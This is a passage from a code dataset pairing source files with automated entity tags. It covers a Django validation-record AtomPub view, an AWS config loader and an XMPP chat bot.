MODIFIES 'last_verified_status'* + """""" + + entryRoot = etree.XML(validateXML) + if entryRoot is None: + raise ValueError(""Unable to parse uploaded XML"") + # parse XML + contentElement = entryRoot.xpath(""*[local-name() = 'content']"")[0] + validateXML = contentElement.xpath(""*[local-name() = 'validate']"")[0] + identifier = validateXML.xpath( + ""*[local-name() = 'identifier']"")[0].text.strip() + last_verified_status = validateXML.xpath( + ""*[local-name() = 'last_verified_status']"")[0].text.strip() + # get the object (or 404) and return to the APP view to finish up. + validate = get_object_or_404(Validate, identifier=identifier) + validate.last_verified_status = last_verified_status + validate.last_verified = datetime.datetime.now() + validate.priority = 0 + validate.save() + return validate + + +def app_validate(request, identifier=None): + """""" + This method handles the ATOMpub protocol for validate objects + """""" + + # are we POSTing a new identifier here? + if request.method == 'POST' and not identifier: + # to object + validateObject = xmlToValidateObject(request.body) + validateObject.save() + # and back to xml + validateObjectXML = validateToXML(validateObject) + atomXML = wrapAtom( + xml=validateObjectXML, + id='http://%s/APP/validate/%s/' % ( + request.META['HTTP_HOST'], validateObject.identifier + ), + title=validateObject.identifier, + ) + atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True) + resp = HttpResponse(atomText, content_type=""application/atom+xml"") + resp.status_code = 201 + resp['Location'] = 'http://%s/APP/validate/%s/' % \ + (request.META['HTTP_HOST'], validateObject.identifier) + elif request.method == 'HEAD': + resp = HttpResponse(content_type=""application/atom+xml"") + resp.status_code = 200 + # if not, return a feed + elif request.method == 'GET' and not identifier: + # negotiate the details of our feed here + validates = Validate.objects.all() + page = int(request.GET['page']) if request.GET.get('page') else 1 + atomFeed = makeObjectFeed( + paginator=Paginator(validates, 20), + objectToXMLFunction=validateToXML, + feedId=request.path[1:], + webRoot='http://%s' % request.META.get('HTTP_HOST'), + title=""validate Entry Feed"", + idAttr=""identifier"", + nameAttr=""identifier"", + dateAttr=""added"", + request=request, + page=page, + author={ + ""name"": APP_AUTHOR.get('name', None), + ""uri"": APP_AUTHOR.get('uri', None) + }, + ) + atomFeedText = XML_HEADER % etree.tostring(atomFeed, pretty_print=True) + resp = HttpResponse(atomFeedText, content_type=""application/atom+xml"") + resp.status_code = 200 + # updating an existing record + elif request.method == 'PUT' and identifier: + returnValidate = xmlToUpdateValidateObject(request.body) + validateObjectXML = validateToXML(returnValidate) + atomXML = wrapAtom( + xml=validateObjectXML, + id='http://%s/APP/validate/%s/' % ( + request.META['HTTP_HOST'], identifier + ), + title=identifier, + ) + atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True) + resp = HttpResponse(atomText, content_type=""application/atom+xml"") + resp.status_code = 200 + elif request.method == 'GET' and identifier: + # attempt to retrieve record -- error if unable + try: + validate_object = Validate.objects.get(identifier=identifier) + except Validate.DoesNotExist: + return HttpResponseNotFound( + ""There is no validate for identifier %s.\n"" % identifier + ) + returnValidate = validate_object + validateObjectXML = validateToXML(returnValidate) + atomXML = wrapAtom( + xml=validateObjectXML, + id='http://%s/APP/validate/%s/' % ( + request.META['HTTP_HOST'], identifier + ), + title=identifier, + author=APP_AUTHOR.get('name', None), + author_uri=APP_AUTHOR.get('uri', None) + ) + atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True) + resp = HttpResponse(atomText, content_type=""application/atom+xml"") + resp.status_code = 200 + elif request.method == 'DELETE' and identifier: + # attempt to retrieve record -- error if unable + try: + validate_object = Validate.objects.get(identifier=identifier) + except: + return HttpResponseNotFound( + ""Unable to Delete. There is no identifier %s.\n"" % identifier) + # grab the validate, delete it, and inform the user. + returnValidate = validate_object + validateObjectXML = validateToXML(returnValidate) + validate_object.delete() + atomXML = wrapAtom( + xml=validateObjectXML, + id='http://%s/APP/validate/%s/' % ( + request.META['HTTP_HOST'], identifier + ), + title=identifier, + ) + atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True) + resp = HttpResponse(atomText, content_type=""application/atom+xml"") + resp.status_code = 200 + return resp + + +def check_json(request): + counts = Validate.objects.last_verified_status_counts() + return HttpResponse(json.dumps(counts), content_type='application/json') + + +class ValidateListView(ListView): + model = Validate + template_name = 'coda_validate/list.html' + context_object_name = 'validation_list' + paginate_by = 20 + + def get_queryset(self): + queryset = super(ValidateListView, self).get_queryset() + + status = self.request.GET.get('status') + if status: + queryset = queryset.filter(last_verified_status=status) + + return queryset +",18335,"[['PERSON', 'codalib.bagatom'], ['URL', 'AUTHOR.ge'], ['DATE_TIME', 'past year'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['DATE_TIME', 'last_day_of_month(year, month'], ['DATE_TIME', '30'], ['DATE_TIME', '29'], ['DATE_TIME', '28'], ['DATE_TIME', ""days'""], ['DATE_TIME', 'last month'], ['DATE_TIME', 'today'], ['DATE_TIME', 'month'], ['DATE_TIME', 'last_day'], ['PERSON', '00:00:00'], ['DATE_TIME', 'last 24 hours'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'num_years'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'Validate.objects.filter'], ['DATE_TIME', ""days'""], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'last_verified_status = etree'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'Parse'], ['PERSON', 'Parse'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['URL', 'http://digital2.library.unt.edu/coda/validatexml/""'], ['URL', 'codalib.ba'], ['URL', 'django.co'], ['URL', 'django.contrib.sites.mo'], ['URL', 'django.contrib.syndication.vi'], ['URL', 'django.core.pa'], ['URL', 'django.ht'], ['URL', 'django.sh'], ['URL', 'django.views.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.al'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.al'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'datetime.datetime.no'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'v.co'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.la'], ['URL', 'index.ht'], ['URL', 'stats.ht'], ['URL', 'settings.VA'], ['URL', 'datetime.date.to'], ['URL', 'today.mo'], ['URL', 'today.ye'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.la'], ['URL', 'counts.va'], ['URL', 'Validate.su'], ['URL', 'date.it'], ['URL', 'years.ad'], ['URL', 'stats.ht'], ['URL', 'date.it'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.fi'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'settings.VA'], ['URL', 'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'prioritize.ht'], ['URL', 'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'validate.ht'], ['URL', 'Site.objects.ge'], ['URL', 'request.GET.ge'], ['URL', 'Validate.objects.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'v.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'verified.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'date.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'etree.Su'], ['URL', 'validateObject.se'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'validate.la'], ['URL', 'validate.la'], ['URL', 'datetime.datetime.no'], ['URL', 'validate.pr'], ['URL', 'validate.sa'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'validateObject.sa'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'validateObject.id'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'request.me'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.al'], ['URL', 'request.GE'], ['URL', 'request.GET.ge'], ['URL', 'request.pa'], ['URL', 'request.META.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'Validate.Do'], ['URL', 'request.ME'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'object.de'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'Validate.objects.la'], ['URL', 'list.ht'], ['URL', 'self.request.GET.ge'], ['URL', 'queryset.fi']]" +28,"#!/usr/bin/env python2 +# coding=utf-8 +"""""" +Config Handler +"""""" + +__author__ = ""Manuel Ebert"" +__copyright__ = ""Copyright 2015, summer.ai"" +__date__ = ""2015-11-09"" +__email__ = dummy@email.com"" + +import boto3 +import os +from util import AttrDict + +path = os.path.dirname(os.path.abspath(__file__)) + + +def load_yaml(filename): + """""" + This is a shitty YAML parser. If we were grown ups, we'd use PyYaml of course. + But since PyYaml refuses to run on AWS Lambda, we'll do this instead. + + Args: + filename - filename to load + Returns: + dict + """""" + def parse_value(value): + if ""#"" in value: + value = value[:value.index(""#"")] + value = value.strip("" \n"") + if not value: + return None + if value.lower() == ""true"": + return True + if value.lower() == ""false"": + return False + try: + return int(value) + except: + try: + return float(value) + except: + return value + result = {} + current_key = None + with open(filename) as f: + for line in f.readlines(): + if "":"" in line: + key, value = line.split("":"", 1) + key = key.strip() + current_key = key + result[key] = parse_value(value) + elif line.strip().startswith(""-""): + value = line.strip("" -\n"") + if not isinstance(result[current_key], list): + result[current_key] = [parse_value(value)] + else: + result[current_key].append(parse_value(value)) + return result + + +def abs_path(filename): + return os.path.join(path, ""config"", ""{}.yaml"".format(filename)) + + +def load_config(config): + keys = load_yaml(abs_path(""default"")) + + keys['credentials'] = {} + if os.path.exists(abs_path(""credentials"")): + keys['credentials'] = load_yaml(abs_path(""credentials"")) + + if config != 'default': + keys.update(load_yaml(abs_path(config))) + + if ""aws_access_key"" in keys['credentials']: + keys['s3'] = boto3.resource( + 's3', region_name=keys['region'], + aws_access_key_id=keys['credentials']['aws_access_key'], + aws_secret_access_key=keys['credentials']['aws_access_secret'] + ) + keys['s3_client'] = boto3.client( + 's3', region_name=keys['region'], + aws_access_key_id=keys['credentials']['aws_access_key'], + aws_secret_access_key=keys['credentials']['aws_access_secret'] + ) + else: + keys['s3'] = boto3.resource('s3', region_name=keys['region']) + keys['s3_client'] = boto3.client('s3', region_name=keys['region']) + + return AttrDict(keys) + + +config = load_config(os.environ.get('WORDNIK_CONFIG', 'default')) + + +def update_config(config_name): + global config + config.__data.update(load_yaml(abs_path(config_name))) +",2919,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-11-09'], ['PERSON', 'Manuel Ebert'], ['DATE_TIME', '2015'], ['PERSON', 'Args'], ['URL', 'summer.ai'], ['URL', 'email.com'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'value.in'], ['URL', 'value.st'], ['URL', 'f.re'], ['URL', 'key.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'os.environ.ge']]" +29,"#!/usr/bin/env python3 +# vim:fileencoding=utf-8 +# +# (C) Copyright 2012 lilydjwg dummy@email.com +# +# This file is part of xmpptalk. +# +# xmpptalk is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# xmpptalk is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with xmpptalk. If not, see . +# + +import sys +import os +import logging +import datetime +import base64 +import hashlib +from collections import defaultdict +from functools import partial +from xml.etree import ElementTree as ET + +import pyxmpp2.exceptions +from pyxmpp2.jid import JID +from pyxmpp2.message import Message +from pyxmpp2.presence import Presence +from pyxmpp2.client import Client +from pyxmpp2.settings import XMPPSettings +from pyxmpp2.roster import RosterReceivedEvent +from pyxmpp2.interfaces import EventHandler, event_handler, QUIT, NO_CHANGE +from pyxmpp2.streamevents import AuthorizedEvent, DisconnectedEvent +from pyxmpp2.interfaces import XMPPFeatureHandler +from pyxmpp2.interfaces import presence_stanza_handler, message_stanza_handler +from pyxmpp2.ext.version import VersionProvider +from pyxmpp2.expdict import ExpiringDictionary +from pyxmpp2.iq import Iq + +try: + from xmpp_receipt import ReceiptSender +except ImportError: + ReceiptSender = None + +from misc import * +import config +import models +from models import ValidationError +from messages import MessageMixin +from user import UserMixin + +if getattr(config, 'conn_lost_interval_minutes', False): + conn_lost_interval = datetime.timedelta(minutes=config.conn_lost_interval_minutes) +else: + conn_lost_interval = None + +class ChatBot(MessageMixin, UserMixin, EventHandler, XMPPFeatureHandler): + got_roster = False + message_queue = None + receipt_sender = None + ignore = set() + + def __init__(self, jid, settings, botsettings=None): + if 'software_name' not in settings: + settings['software_name'] = self.__class__.__name__ + if 'software_version' not in settings: + settings['software_version'] = __version__ + version_provider = VersionProvider(settings) + + handlers = [] + if ReceiptSender: + self.receipt_sender = rs = ReceiptSender() + handlers.append(rs) + + handlers.extend([self, version_provider]) + self.client = Client(jid, handlers, settings) + + self.presence = defaultdict(dict) + self.subscribes = ExpiringDictionary(default_timeout=5) + self.invited = {} + self.avatar_hash = None + self.settings = botsettings + + def run(self): + self.client.connect() + self.jid = self.client.jid.bare() + logger.info('self jid: %r', self.jid) + self.update_on_setstatus = set() + + if self.receipt_sender: + self.receipt_sender.stream = self.client.stream + self.client.run() + + def disconnect(self): + '''Request disconnection and let the main loop run for a 2 more + seconds for graceful disconnection.''' + self.client.disconnect() + while True: + try: + self.client.run(timeout = 2) + except pyxmpp2.exceptions.StreamParseError: + # we raise SystemExit to exit, expat says XML_ERROR_FINISHED + pass + else: + break + + def handle_early_message(self): + self.got_roster = True + q = self.message_queue + if q: + self.now = datetime.datetime.utcnow() + for sender, stanza in q: + self.current_jid = sender + self._cached_jid = None + try: + timestamp = stanza.as_xml().find('{urn:xmpp:delay}delay').attrib['stamp'] + except AttributeError: + timestamp = None + self.handle_message(stanza.body, timestamp) + self.message_queue = self.__class__.message_queue = None + + @event_handler(RosterReceivedEvent) + def roster_received(self, stanze): + self.delayed_call(2, self.handle_early_message) + self.delayed_call(getattr(config, 'reconnect_timeout', 24 * 3600), self.signal_connect) + nick, avatar_type, avatar_file = (getattr(config, x, None) for x in ('nick', 'avatar_type', 'avatar_file')) + if nick or (avatar_type and avatar_file): + self.set_vcard(nick, (avatar_type, avatar_file)) + return True + + def signal_connect(self): + logging.info('Schedule to re-connecting...') + self.client.disconnect() + + @message_stanza_handler() + def message_received(self, stanza): + if stanza.stanza_type != 'chat': + return True + if not stanza.body: + logging.info(""%s message: %s"", stanza.from_jid, stanza.serialize()) + return True + + sender = stanza.from_jid + body = stanza.body + self.current_jid = sender + self.now = datetime.datetime.utcnow() + + logging.info('[%s] %s', sender, stanza.body) + if '@' not in str(sender.bare()): + logging.info('(server messages ignored)') + return True + + if str(sender.bare()) in self.ignore: + logging.info('(The above message is ignored on purpose)') + return True + + if getattr(config, 'ban_russian'): + if str(sender.bare()).endswith('.ru'): + logging.info('(Russian messager banned)') + return True + elif is_russian(body): + logging.info('(Russian message banned)') + return True + + if not self.got_roster: + if not self.message_queue: + self.message_queue = [] + self.message_queue.append((sender, stanza)) + else: + self.handle_message(body) + + logging.info('done with new message') + return True + + def send_message(self, receiver, msg): + if isinstance(receiver, str): + receiver = JID(receiver) + + m = Message( + stanza_type = 'chat', + from_jid = self.jid, + to_jid = receiver, + body = msg, + ) + self.send(m) + + def reply(self, msg): + self.send_message(self.current_jid, msg) + + def send(self, stanza): + self.client.stream.send(stanza) + + def delayed_call(self, seconds, func, *args, **kwargs): + self.client.main_loop.delayed_call(seconds, partial(func, *args, **kwargs)) + + @event_handler(DisconnectedEvent) + def handle_disconnected(self, event): + return QUIT + + @property + def roster(self): + return self.client.roster + + def get_online_users(self): + ret = [x.jid for x in self.roster if x.subscription == 'both' and \ + str(x.jid) in self.presence] + logging.info('%d online buddies: %r', len(ret), ret) + return ret + + def get_xmpp_status(self, jid): + return sorted(self.presence[str(jid)].values(), key=lambda x: x['priority'], reverse=True)[0] + + def xmpp_setstatus(self, status, to_jid=None): + if isinstance(to_jid, str): + to_jid = JID(to_jid) + + presence = Presence(status=status, to_jid=to_jid) + self.send(presence) + + def update_roster(self, jid, name=NO_CHANGE, groups=NO_CHANGE): + self.client.roster_client.update_item(jid, name, groups) + + def removeInvitation(self): + for ri in self.roster.values(): + if ri.ask is not None: + self.client.roster_client.remove_item(ri.jid) + logging.info('%s removed', ri.jid) + + def unsubscribe(self, jid, type='unsubscribe'): + presence = Presence(to_jid=jid, stanza_type=type) + self.send(presence) + + def subscribe(self, jid): + self.invited[jid] = 2 + presence = Presence(to_jid=jid, stanza_type='subscribe') + self.send(presence) + + @presence_stanza_handler('subscribe') + def handle_presence_subscribe(self, stanza): + logging.info('%s subscribe', stanza.from_jid) + sender = stanza.from_jid + bare = sender.bare() + + # avoid repeated request + invited = False + if bare not in self.subscribes: + invited = self.invited.get(bare, False) + if invited is not False: + if invited == 2: + self.invited[bare] = 1 + else: + del self.invited[bare] + return stanza.make_accept_response() + # We won't deny inivted members + self.handle_userjoin_before() + else: + if config.private and str(bare) != config.root: + self.send_message(sender, _('Sorry, this is a private group, and you are not invited.')) + return stanza.make_deny_response() + if not self.handle_userjoin_before(): + return stanza.make_deny_response() + + self.current_jid = sender + self.now = datetime.datetime.utcnow() + try: + self.handle_userjoin(action=stanza.stanza_type) + except ValidationError: + #The server is subscribing + pass + self.subscribes[bare] = True + + if stanza.stanza_type.endswith('ed'): + return stanza.make_accept_response() + + if invited is False: + presence = Presence(to_jid=stanza.from_jid.bare(), + stanza_type='subscribe') + return [stanza.make_accept_response(), presence] + + @presence_stanza_handler('subscribed') + def handle_presence_subscribed(self, stanza): + # use the same function + logging.info('%s subscribed', stanza.from_jid) + return self.handle_presence_subscribe(stanza) + + @presence_stanza_handler('unsubscribe') + def handle_presence_unsubscribe(self, stanza): + logging.info('%s unsubscribe', stanza.from_jid) + sender = stanza.from_jid + self.current_jid = sender + self.now = datetime.datetime.utcnow() + self.handle_userleave(action=stanza.stanza_type) + + if stanza.stanza_type.endswith('ed'): + return stanza.make_accept_response() + + presence = Presence(to_jid=stanza.from_jid.bare(), + stanza_type='unsubscribe') + return [stanza.make_accept_response(), presence] + + @presence_stanza_handler('unsubscribed') + def handle_presence_unsubscribed(self, stanza): + # use the same function + logging.info('%s unsubscribed', stanza.from_jid) + return self.handle_presence_unsubscribe(stanza) + + @presence_stanza_handler() + def handle_presence_available(self, stanza): + if stanza.stanza_type not in ('available', None): + return False + + jid = stanza.from_jid + plainjid = str(jid.bare()) + if plainjid == str(self.jid): + return + + self.now = datetime.datetime.utcnow() + if plainjid not in self.presence: + type = 'new' + self.current_jid = jid + self.user_update_presence(plainjid) + if conn_lost_interval and self.current_user and self.current_user.last_seen and \ + self.now - self.current_user.last_seen < conn_lost_interval: + type = 'reconnect' + self.send_lost_message() + logging.info('%s[%s] (%s)', jid, stanza.show or 'available', type) + + if self.roster and jid.bare() not in self.roster: + presence = Presence(to_jid=jid.bare(), stanza_type='subscribe') + self.send(presence) + presence = Presence(to_jid=jid.bare(), stanza_type='subscribed') + self.send(presence) + else: + if jid.resource not in self.presence[plainjid]: + self.user_update_presence(plainjid) + logging.info('%s[%s]', jid, stanza.show or 'available') + + self.presence[plainjid][jid.resource] = { + 'show': stanza.show, + 'status': stanza.status, + 'priority': stanza.priority, + } + + if self.get_user_by_jid(plainjid) is None: + try: + self.current_jid = jid + self.handle_userjoin() + except ValidationError: + #The server is subscribing + pass + + if config.warnv105 and jid.resource and \ + jid.resource.startswith('Talk.') and not jid.resource.startswith('Talk.v104'): + # Got a Talk.v107... + # No need to translate; GTalk only has a v105 for Chinese. + self.send_message(jid, '警告:你正在使用的可能是不加密的 GTalk v105 版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk v104 英文版或者其它 XMPP 客户端。\nGTalk 英文版: http://www.google.com/talk/index.html\nPidgin: http://www.pidgin.im/') + + return True + + @presence_stanza_handler('unavailable') + def handle_presence_unavailable(self, stanza): + jid = stanza.from_jid + plainjid = str(jid.bare()) + if plainjid in self.presence and plainjid != str(self.jid): + try: + del self.presence[plainjid][jid.resource] + except KeyError: + pass + if self.presence[plainjid]: + logging.info('%s[unavailable] (partly)', jid) + else: + del self.presence[plainjid] + self.now = datetime.datetime.utcnow() + self.user_disappeared(plainjid) + logging.info('%s[unavailable] (totally)', jid) + return True + + @event_handler() + def handle_all(self, event): + '''Log all events.''' + logging.info('-- {0}'.format(event)) + + def get_name(self, jid): + if isinstance(jid, str): + jid = JID(jid) + else: + jid = jid.bare() + try: + return self.roster[jid].name or hashjid(jid) + except KeyError: + return hashjid(jid) + + def get_vcard(self, jid=None, callback=None): + '''callback is used as both result handler and error handler''' + q = Iq( + to_jid = jid and jid.bare(), + stanza_type = 'get', + ) + vc = ET.Element(""{vcard-temp}vCard"") + q.add_payload(vc) + if callback: + self.stanza_processor.set_response_handlers(q, callback, callback) + self.send(q) + + def set_vcard(self, nick=None, avatar=None): + self.get_vcard(callback=partial(self._set_vcard, nick, avatar)) + + def _set_vcard(self, nick=None, avatar=None, stanza=None): + #FIXME: This doesn't seem to work with jabber.org + q = Iq( + from_jid = self.jid, + stanza_type = 'set', + ) + vc = ET.Element(""{vcard-temp}vCard"") + if nick is not None: + n = ET.SubElement(vc, '{vcard-temp}FN') + n.text = nick + if avatar is not None: + type, picfile = avatar + photo = ET.SubElement(vc, '{vcard-temp}PHOTO') + t = ET.SubElement(photo, '{vcard-temp}TYPE') + t.text = type + d = ET.SubElement(photo, '{vcard-temp}BINVAL') + data = open(picfile, 'rb').read() + d.text = base64.b64encode(data).decode('ascii') + self.avatar_hash = hashlib.new('sha1', data).hexdigest() + + q.add_payload(vc) + self.stanza_processor.set_response_handlers( + q, self._set_vcard_callback, self._set_vcard_callback) + self.send(q) + + def _set_vcard_callback(self, stanza): + if stanza.stanza_type == 'error': + logging.error('failed to set my vCard.') + else: + logging.info('my vCard set.') + self.update_presence() + + def update_presence(self): + #TODO: update for individual users + presence = self.settings['presence'] + x = ET.Element('{vcard-temp:x:update}x') + if self.avatar_hash: + photo = ET.SubElement(x, '{vcard-temp:x:update}photo') + photo.text = self.avatar_hash + presence.add_payload(x) + self.send(presence) + +def runit(settings, mysettings): + bot = ChatBot(JID(config.jid), settings, mysettings) + try: + bot.run() + # Connection resets + raise Exception + except SystemExit as e: + if e.code == CMD_RESTART: + # restart + bot.disconnect() + models.connection.disconnect() + try: + os.close(lock_fd[0]) + except: + pass + logging.info('restart...') + os.execv(sys.executable, [sys.executable] + sys.argv) + except KeyboardInterrupt: + pass + finally: + ChatBot.message_queue = bot.message_queue + bot.disconnect() + +def main(): + gp = models.connection.Group.one() + if gp and gp.status: + st = gp.status + else: + st = None + settings = dict( + # deliver here even if the admin logs in + initial_presence = Presence(priority=30, status=st), + poll_interval = 3, + ) + botsettings = { + 'presence': settings['initial_presence'], + } + settings.update(config.settings) + settings = XMPPSettings(settings) + + if config.trace: + logging.info('enabling trace') + for logger in ('pyxmpp2.IN', 'pyxmpp2.OUT'): + logger = logging.getLogger(logger) + logger.setLevel(logging.DEBUG) + + for logger in ( + 'pyxmpp2.mainloop.base', 'pyxmpp2.expdict', + 'pyxmpp2.mainloop.poll', 'pyxmpp2.mainloop.events', + 'pyxmpp2.transport', 'pyxmpp2.mainloop.events', + ): + logger = logging.getLogger(logger) + logger.setLevel(max((logging.INFO, config.logging_level))) + + if config.logging_level > logging.DEBUG: + restart_if_failed(runit, 3, args=(settings, botsettings)) + else: + runit(settings, botsettings) + +if __name__ == '__main__': + setup_logging() + models.init() + main() +",16313,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2012'], ['PERSON', 'lilydjwg'], ['LOCATION', 'xmpptalk'], ['PERSON', 'Iq'], ['PERSON', 'self.presence = defaultdict(dict'], ['DATE_TIME', '2 more\n seconds'], ['LOCATION', 'nick'], ['NRP', 'avatar_type'], ['NRP', 'avatar_type'], ['PERSON', 'stanza.body'], ['PERSON', ""logging.info('(server""], ['DATE_TIME', 'seconds'], ['LOCATION', 'ri'], ['LOCATION', 'del self.invited[bare'], ['PERSON', 'str(bare'], ['PERSON', 'plainjid = str(jid.bare'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['NRP', 'Chinese'], ['PERSON', '版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk'], ['PERSON', 'plainjid = str(jid.bare'], ['LOCATION', 'del self.presence[plainjid][jid.resource'], ['PERSON', 'jid = JID(jid'], ['LOCATION', 'nick'], ['LOCATION', 'self._set_vcard_callback'], ['PERSON', ""settings['initial_presence""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.google.com/talk/index.html\\nPidgin:'], ['URL', ""http://www.pidgin.im/'""], ['URL', 'email.com'], ['URL', 'xml.et'], ['URL', 'pyxmpp2.me'], ['URL', 'pyxmpp2.pr'], ['URL', 'pyxmpp2.cl'], ['URL', 'pyxmpp2.se'], ['URL', 'pyxmpp2.ro'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.st'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.ext.ve'], ['URL', 'pyxmpp2.iq'], ['URL', 'config.co'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.pr'], ['URL', 'self.su'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'self.client.co'], ['URL', 'self.client.jid.ba'], ['URL', 'logger.in'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'sender.st'], ['URL', 'self.client.st'], ['URL', 'self.client.ru'], ['URL', 'self.cl'], ['URL', 'self.client.ru'], ['URL', 'pyxmpp2.exceptions.St'], ['URL', 'self.me'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'stanza.as'], ['URL', 'stanza.bo'], ['URL', 'self.me'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.si'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'self.cl'], ['URL', 'stanza.st'], ['URL', 'stanza.bo'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.se'], ['URL', 'stanza.fr'], ['URL', 'stanza.bo'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'logging.in'], ['URL', 'stanza.bo'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.cu'], ['URL', 'self.client.stream.se'], ['URL', 'self.client.ma'], ['URL', 'loop.de'], ['URL', 'self.client.ro'], ['URL', 'self.ro'], ['URL', 'x.su'], ['URL', 'self.pr'], ['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.se'], ['URL', 'self.client.ro'], ['URL', 'self.roster.va'], ['URL', 'ri.as'], ['URL', 'self.client.ro'], ['URL', 'client.re'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'sender.ba'], ['URL', 'self.su'], ['URL', 'self.invited.ge'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'stanza.ma'], ['URL', 'config.pr'], ['URL', 'config.ro'], ['URL', 'self.se'], ['URL', 'stanza.ma'], ['URL', 'stanza.ma'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'self.su'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'logging.in'], ['URL', 